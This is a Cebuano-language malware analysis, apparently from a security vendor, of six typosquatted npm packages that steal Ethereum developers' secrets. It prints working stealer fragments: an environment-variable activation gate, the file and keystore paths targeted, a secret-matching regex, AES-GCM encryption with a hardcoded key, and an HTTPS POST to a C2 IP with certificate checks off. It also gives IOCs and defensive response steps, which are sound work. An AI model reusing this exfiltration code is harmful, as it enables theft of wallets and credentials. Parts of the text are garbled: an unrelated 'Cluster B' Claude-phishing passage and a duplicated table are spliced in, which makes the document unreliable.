TL; DR
Niadtong Mayo 6, 2026, usa ka tigmantala sa npm, namikazesarada010206, nagpagawas ug unom ka malisyosong pakete nga nagtumong sa Ethereum, Solidity, ug DeFi developer ecosystem.
Ang mga pakete, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, Ug web3-utils-core, migamit ug mga katuohan nga ngalan nga gidisenyo aron tan-awon sama sa mga helper library para sa sikat nga Web3 tooling.
Ang tanang unom ka pakete adunay parehas nga sulod telemetry.js file. Ang file kay byte-identical sa tibuok cluster, nga adunay SHA-256:
Ang malware dili mo-execute sa oras sa pag-install. Walay preinstall or postinstall kaw-it. Hinuon, kini mo-aktibo kung ang pakete gi-import pinaagi sa require().
Importante kana nga detalye.
Ang implant maghulat hangtod nga ang usa ka developer aktuwal nga mogamit sa package. Dayon susihon niini kung ang workstation morag usa ka tinuod nga Ethereum / Solidity development environment. Mangita kini og Alchemy o Infura keys, private keys, mnemonics, deployer keys, o usa ka lokal nga Foundry directory.
Kon motakdo ang host, ang kawatan mokolekta sa mga SSH private key, Foundry / Geth / Brownie wallet keystores, .env* mga file, ug sensitibo nga mga variable sa palibot. Gi-encrypt niini ang bundle gamit ang AES-256-GCM gamit ang hardcoded passphrase ug gi-exfiltrate kini ngadto sa usa ka raw IPv4 C2 endpoint nga adunay TLS verification nga gi-disable.
Gikumpirma sa Malware Early Warning (MEW) system sa Xygeni nga ang tanang unom ka pakete malisyoso. Ang bundle sa npm registry takedown report pending pa.
Ang Cluster: Unom ka Pakete, Usa ka Tigmantala
Ang account sa tigmantala namikazesarada010206 nalambigit sa wala mapamatud-i nga Gmail address namikazesarada010206@gmail.com.
Ang kampanya migawas isip usa ka adlaw nga pagsabwag sa publikasyon niadtong Mayo 6, 2026. Ang tanang unom ka pakete gi-bersyon isip 1.0.0, walay runtime dependencies, ug nagpadala lang og tulo ka file:
package.json index.js telemetry.js Gideklara usab nila ang parehas nga source repository:
https://github.com/harunosakura030303-maker/evmchain-config Ang unang tulo ka pakete nadakpan sa mga MEW scanner sa unang publikasyon. Ang nahibiling tulo gipugos pag-flag human sa pagrepaso sa analista sa npm profile sa tigmantala. Sa dihang parehas na ang byte-identical telemetry.js gikumpirma sa tibuok cluster, kini gisirado isip malisyoso pinaagi sa consistency.
| package | Version | npm Gipatik | Tiket sa MEW | hukom |
|---|---|---|---|---|
| viem-core | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | Makadaot |
| viem-utils-core | 1.0.0 | 2026-05-06 | #51050 | Makadaot |
| mga utils sa hardhat-core | 1.0.0 | 2026-05-06 | #51051 | Makadaot |
| evm-utils | 1.0.0 | 2026-05-06 | #51069 | Malisyoso, pinaagi sa pagkamakanunayon |
| mga gamit sa pandayan | 1.0.0 | 2026-05-06 | #51071 | Malisyoso, pinaagi sa pagkamakanunayon |
| web3-utils-core | 1.0.0 | 2026-05-06 | #51070 | Malisyoso, pinaagi sa pagkamakanunayon |
Ang estratehiya sa pagngalan yano ra apan epektibo.
Kini nga mga pakete wala magsundog sa eksaktong mga ngalan sa upstream. Hinuon, naggamit sila og mga posible nga "utility" suffix sama sa -core, -utils, Ug -utils-coreKana naghimo kanila nga tan-awon sama sa mga kaubang librarya nga gilauman sa usa ka developer nga makita duol sa Web3 tooling.
| Malisyoso nga Pakete | Lehitimong Target |
|---|---|
| viem-core | viem, usa ka sikat nga kliyente sa Ethereum TypeScript |
| viem-utils-core | viem |
| mga utils sa hardhat-core | hardhat, usa ka mainstream nga palibot sa pagpalambo sa Solidity |
| evm-utils | Heneral nga ngalan sa himan sa EVM |
| mga gamit sa pandayan | pandayan, usa ka kadena sa himan sa Solididad |
| web3-utils-core | web3-utils, mga katabang sa Web3.js |
Mao kini ang sumbanan sa "dugang nga pakete": dili "Ako ang tinuod nga pakete," apan "Murag usa ako ka makatarunganon nga katabang sa tinuod nga pakete."
Para sa mga DeFi developer nga paspas molihok, igo na kana aron makamugna og risgo.
Unsay Mahitabo Kon ang Pakete I-import
Gamay ra ang kadena sa pag-atake, tinuyo, ug naka-focus sa mga palibot sa pagpalambo sa crypto.
Walay kaw-it para sa pag-instalar. Hinuon, ang matag pakete adunay index.js nga mo-export sa stub functionality ug dayon mo-load sa malisyosong telemetry module.
require('./telemetry').init(); Kini nagpasabot nga ang malware mo-activate sa unang import.
Kana mapuslanon sa operasyon para sa tig-atake. Daghang scanner ug sandbox ang nag-focus sa install-time behavior. Kini nga package maghulat hangtod nga kini aktuwal nga gamiton sa usa ka developer, build script, test suite, o runtime path.
Activation Gate: Pag-fire Lamang sa Tinuod nga Web3 Developer Workstations
Ang labing importante nga bahin sa implant mao ang activation gate.
Ang malware nagsusi sa mga environment variable nga kasagarang makita sa mga makina sa developer sa Ethereum / Solidity:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); Gisusi usab niini kung ang Foundry daw na-install na:
fs.existsSync(path.join(os.homedir(), '.foundry')) Kon walay bisan usa sa mga kondisyon nga tinuod, ang function mobalik ug walay buhaton.
Kana makapahimo sa pakete nga mas hilom sa mga generic analysis environment. Ang usa ka sandbox nga walay Foundry, Alchemy keys, Infura keys, private keys, o mnemonics mahimong makakita og dili makadaot nga import.
Sa usa ka katugbang nga host, ang malware maghulat og 60 ngadto sa 90 segundos sa dili pa kini kolektahon:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); Ang pagkalangan makapakunhod sa klaro nga korelasyon tali sa import ug exfiltration. .unref() Ang tawag motugot usab sa proseso sa host nga mogawas sa normal kung ang pakete gi-import sa usa ka mubo nga kinabuhi nga script.
Dili kini saba nga smash-and-grab nga pamatasan. Kini usa ka gitarget nga stealer nga gidisenyo aron malikayan ang pagdagan gawas kung ang palibot sa developer angayan nga kawaton.
Unsay Gikolekta sa Kawatan
Sa higayon nga makapasar na ang activation gate, ang malware mangolekta gikan sa mga tinubdan nga labing importante sa Web3 development: private keys, wallet keystores, deployment credentials, cloud secrets, npm tokens, ug local project configuration.
| tinubdan | Unsa ang Gikolekta |
|---|---|
| proseso.env | Bisan unsang baryable nga motakdo sa /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | Mga file nga adunay PRIVATE KEY o BEGIN OPENSSH, lakip ang tibuok nga sulod sa file |
| ~/.pandayan/mga tindahan sa yawe/* | Mga file sa keystore sa wallet sa pandayan |
| ~/.ethereum/keystore/* | Mga file sa keystore sa Geth wallet |
| ~/.brownie/mga account/* | Mga file sa keystore sa brownie wallet |
| ${cwd}/.env | Kompleto nga sulod sa file |
| ${cwd}/.env.local | Kompleto nga sulod sa file |
| ${cwd}/.env.production | Kompleto nga sulod sa file |
| ${cwd}/.env.development | Kompleto nga sulod sa file |
| os.hostname() | Metadata sa host |
| crypto.randomUUID() | Identipikasyon sa biktima/sesyon |
| Petsa.karon() | Selyo sa oras sa pagkolekta |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com Ang mga token sa ATTA mao ang:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 Wala pa mi makakumpirmar kon ang telemetry mao ba ang kaugalingong analytics sa operator o usa ka gilain nga monetized channel. Parehas ra ang mga ATTA token sa duha ka sample nga among gisusi.
Cluster B: heibai
claude.hk OAuth Phishing + ANTHROPIC_BASE_URL Hijack
Ang sampol sa Abril 1 mao ang mas lisod ug mas sayo nga bahin sa kampanya.
heibai:2.1.88-claude.hk-4 gimantala ni wuguoqiangvip28, usa ka account nga gihimo niadtong Hunyo 7, 2025. Ang pakete klaro nga nag-bersyon sa iyang kaugalingon batok sa lehitimo 2.1.88 Antropikong pagpagawas.
Wala kini magtagad sa CA-cert MITM. Hinuon, kini nagbakak sa tiggamit bahin sa OAuth endpoint.
Ang mga malisyoso nga dugang dugang sa leaked Claude Code source naglakip sa:
| tinubdan | Unsa ang Gikolekta |
|---|---|
| proseso.env | Bisan unsang baryable nga motakdo sa /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | Mga file nga adunay PRIVATE KEY o BEGIN OPENSSH, lakip ang tibuok nga sulod sa file |
| ~/.pandayan/mga tindahan sa yawe/* | Mga file sa keystore sa wallet sa pandayan |
| ~/.ethereum/keystore/* | Mga file sa keystore sa Geth wallet |
| ~/.brownie/mga account/* | Mga file sa keystore sa brownie wallet |
| ${cwd}/.env | Kompleto nga sulod sa file |
| ${cwd}/.env.local | Kompleto nga sulod sa file |
| ${cwd}/.env.production | Kompleto nga sulod sa file |
| ${cwd}/.env.development | Kompleto nga sulod sa file |
| os.hostname() | Metadata sa host |
| crypto.randomUUID() | Identipikasyon sa biktima/sesyon |
| Petsa.karon() | Selyo sa oras sa pagkolekta |
Ang listahan sa target espesipiko kaayo. Dili kini pagpangawat sa browser o pagpangawat sa kredensyal. Kini gitumong sa mga developer nga naghimo, nagsulay, nag-deploy, o nagpadagan sa mga aplikasyon sa Ethereum.
Ilabi na ka importante ang paglakip sa Foundry, Geth, ug Brownie keystores. Kini nga mga file mahimong magrepresentar sa direktang pag-access sa mga wallet o deployment identities. Kung ang tig-atake makapares niini sa mga password, mnemonics, o mga sekreto sa palibot, mahimo silang makabalhin sa mga pondo, magpakaaron-ingnon nga mga deployer, o makompromiso ang mga operasyon sa smart contract.
Pag-encrypt Sa Dili Pa ang Exfiltration
Ang malware mo-encrypt sa nakolekta nga datos sa dili pa kini ipadala.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); Ang hardcoded passphrase mao ang:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d Ang katapusang payload giputos isip JSON:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} Ang encryption dili makapahimo sa malware nga mas abante sa iyang kaugalingon. Apan, kini makapahimo sa pag-inspeksyon sa network nga mas lisod. Ang usa ka tigpanalipod nga nagbantay sa paggawas makakita sa usa ka JSON payload, apan dili ang gikawat nga mga yawe, mga file sa wallet, o .env mga sulod nga walay hardcoded passphrase ug decryption logic.
Pag-exfiltration ngadto sa usa ka Raw IPv4 C2
Ang agianan sa exfiltration gi-hardcode:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); Ang malware magpadala og datos ngadto sa:
https://76.13.37.80:8443/api/v1/telemetry Duha ka detalye ang talagsaon.
Una, ang C2 usa ka hilaw nga IPv4 address imbes nga usa ka domain. Kana nagtangtang sa panginahanglan alang sa pagparehistro sa domain ug malikayan ang pipila ka mga pag-detect base sa domain.
Ikaduha, ang TLS verification dili ma-disable kon:
rejectUnauthorized: false Kana nagtugot sa malware sa pagdawat sa bisan unsang sertipiko, lakip ang mga sertipiko nga gipirmahan sa kaugalingon. Sa ato pa, ang tig-atake makadawat og naka-encrypt nga transportasyon nga dili kinahanglan og balido nga publikong sertipiko.
Walay retry logic ug walay fallback host. Ang mga sayop hilom nga matunaw. Kini magpabiling hilom ang package kung ang C2 offline o dili makontak.
Nganong Importante Kini nga Kampanya
Kadaghanan sa mga malisyoso nga npm package nga gitumong sa mga developer nga mangita og lapad nga mga kredensyal: mga npm token, AWS key, GitHub token, o .npmrc File.
Kini nga kampanya nagpamenos sa target.
Mangita kini og mga timailhan nga ang makina iya sa usa ka Ethereum o Solidity developer. Dayon kuhaon niini ang eksaktong mga asset nga importante sa maong palibot: wallet keystores, private keys, mnemonics, deployer keys, .env mga file, ug mga SSH key.
Kana naghimo sa kampanya nga mas delikado alang sa mga Web3 team kaysa sa usa ka generic nga npm stealer.
Ang usa ka malampuson nga impeksyon mahimong magbutyag:
- Mga wallet sa pag-deploy
- Mga yawe sa admin sa smart contract
- Mga yawe sa tighatag sa RPC
- Mga kredensyal sa pag-deploy sa cloud
- mga token sa pagmantala sa npm
- Pag-access sa SSH sa imprastraktura sa developer o build
- Mga sekreto sa proyekto nga gitipigan sa
.envfile - Mga keystore sa pitaka para sa Foundry, Geth, o Brownie
Ang mga ngalan sa pakete nagpakita usab og klaro nga social engineering. Gipunting nila ang Web3 developer ecosystem pinaagi sa pamilyar nga mga ngalan sa himan: viem, hardhat, foundry, evm, Ug web3.
Dili kinahanglan nga ikompromiso sa aktor ang tinuod nga mga proyekto. Kinahanglan lang nila og developer aron i-install ang morag makatarunganon nga kauban nga pakete.
Mga Timailhan sa Kompromiso ug Pag-ila
| Mga Pakete ug Tigmantala | |
|---|---|
| Field | bili |
| tigmantala sa npm | namikazesarada010206 |
| Email sa tigmantala | namikazesarada010206@gmail.com |
| email napamatud-an | Dili |
| SCM napamatud-an | Dili |
| Iskor sa reputasyon | 1.0 |
| packages | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core |
| Mga bersikulo | Ang tanan nga 1.0.0 |
| Tinubdan nga tipiganan | https://github.com/harunosakura030303-maker/evmchain-config |
| Nakumpirma nga malisyoso | Tanan nga unom ka pakete |
| network | |
|---|---|
| Type | bili |
| C2 nga katapusan nga punto | https://76.13.37.80:8443/api/v1/telemetry |
| C2 IP | 76.13.37.80 |
| C2 nga pantalan | 8443/tcp |
| Pamatasan sa TLS | isalikwayWala Gitugot: bakak |
| Eskema sa payload | {"v":2,"iv": ,"d": ,"t": } |
| Mga File ug Hash | |
|---|---|
| Type | bili |
| telemetry.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| Layout sa pakete | package.json, index.js, telemetry.js |
| Ihap sa file | 3 |
| Gibana-bana nga kinatibuk-ang gidak-on | 3.4 KB |
Mga Senyales sa Pagpaaktibo
Ang malware mosusi niining mga environment variable:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY Gisusi usab niini ang:
~/.foundry/ Gipunting nga mga Dalan sa Host
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development Regex sa Koleksyon
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i Mga Nota sa Pag-ila
Daghang mga lagda ang nakasunod niini nga kampanya nga dili kinahanglan ang kompleto nga pag-analisar sa pamatasan.
Una, i-scan ang mga lockfile para sa unom ka malisyosong ngalan sa pakete:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core Bisan unsang duwa sa package-lock.json, yarn.lock, pnpm-lock.yaml, o node_modules ang kasaysayan kinahanglan nga isipon nga usa ka seryoso nga panghitabo.
Ikaduha, monitora ang mga proseso sa Node.js nga nagbasa sa mga agianan sa wallet keystore:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ Talagsa ra kini nga lehitimong pamatasan para sa usa ka pakete nga gi-import isip usa ka helper dependency. Kini labi ka kadudahan kung gisundan sa outbound network activity.
Ikatulo, babagan o alerto ang mga koneksyon sa HTTPS ngadto sa:
76.13.37.80:8443 Ilabi na kung ang agianan sa hangyo mao ang:
/api/v1/telemetry Ikaupat, pangitaa ang mga npm package nga naghiusa niining mga kinaiya:
- Bag-o o ubos og reputasyon nga tigmantala
- Wala mapamatud-i nga Gmail account
- Ngalan sa pakete nga kasikbit sa Web3
- Walay makahuluganon nga kasaysayan sa repository
- Layout sa gagmay nga pakete
index.jsnga nagkarga og telemetry o helper file- Walay mga dependency sa runtime
- Sensitibo nga koleksyon sa variable sa palibot
- Pag-access sa keystore sa wallet
Mas mapuslanon kini nga sumbanan kaysa usa ka IOC tungod kay ang sunod nga pakete mahimong mag-usab sa IP address apan magpabilin ang parehas nga lohika sa pag-target.
Checklist sa Tubag sa Kompromiso
Kon ang usa ka developer migamit og usa sa unom ka pakete ug ang ilang palibot mitakdo sa activation gate, isipa ang workstation nga nakompromiso.
Apil niini ang mga makina nga naka-install na ang Foundry, mga yawe sa Alchemy o Infura sa palibot, mga pribadong yawe, mnemonics, o mga yawe sa deployer.
Girekomendar nga tubag:
- Idiskonekta ang host gikan sa network.
- Panalipdan
node_modules, mga lockfile, kasaysayan sa shell, ug mga may kalabutan nga log para sa forensics. - I-rotate ang matag SSH keypair ubos sa
~/.ssh/. - I-rotate ang mga yawe sa pitaka para sa matag keystore sa ubos
~/.foundry,~/.ethereum, Ug~/.brownie. - Ibalhin ang pundo ngadto sa bag-ong mga pitaka.
- Ibalik ang matag sekreto nga gitipigan
.env*mga file sa mga repository nga gitrabahoan sa developer. - I-rotate ang mga sekreto sa palibot nga mohaom sa regex sa koleksyon, lakip ang mga AWS key, npm token, deploy token, API key, private key, seeds, ug mnemonics.
- Audit cloud, npm, GitHub, RPC provider, ug blockchain activity sukad sa unang pag-install sa package.
- Susiha pag-usab ang imahe sa workstation sa dili pa gamiton pag-usab.
Unsay Angay Kuhaon sa mga Tigpanalipod
Kini nga kampanya nagpakita kung giunsa ang npm typosquatting nag-uswag palibot sa mga high-value developer ecosystem.
Wala magkinahanglan og paglahutay ang aktor. Wala nila kinahanglana ang paglibog. Wala gani nila kinahanglana ang pagpatuman sa oras sa pag-install.
Hinuon, misalig sila sa tulo ka butang:
- Makatarunganon nga mga ngalan sa pakete sa Web3
- Pag-aktibo lamang sa tinuod nga mga makina sa pagpalambo sa crypto
- Direktang pagpangawat sa mga file ug mga sekreto nga labing importante sa mga developer sa Ethereum
Mao nga dali ra masipyat ang kampanya sa halapad nga pag-scan ug delikado kung kini moabut sa husto nga palibot.
Para sa mga Web3 team, klaro ang leksyon: isipa ang mga ngalan sa dependency isip kabahin sa imong modelo sa hulga. Ang usa ka pakete nga morag dili makadaot nga katabang mahimo gihapon nga labing mubo nga agianan padulong sa pagkompromiso sa wallet.
Gireport na sa npm registry. Among i-update kini nga post kung matangtang na ang publisher account ug mga pakete.




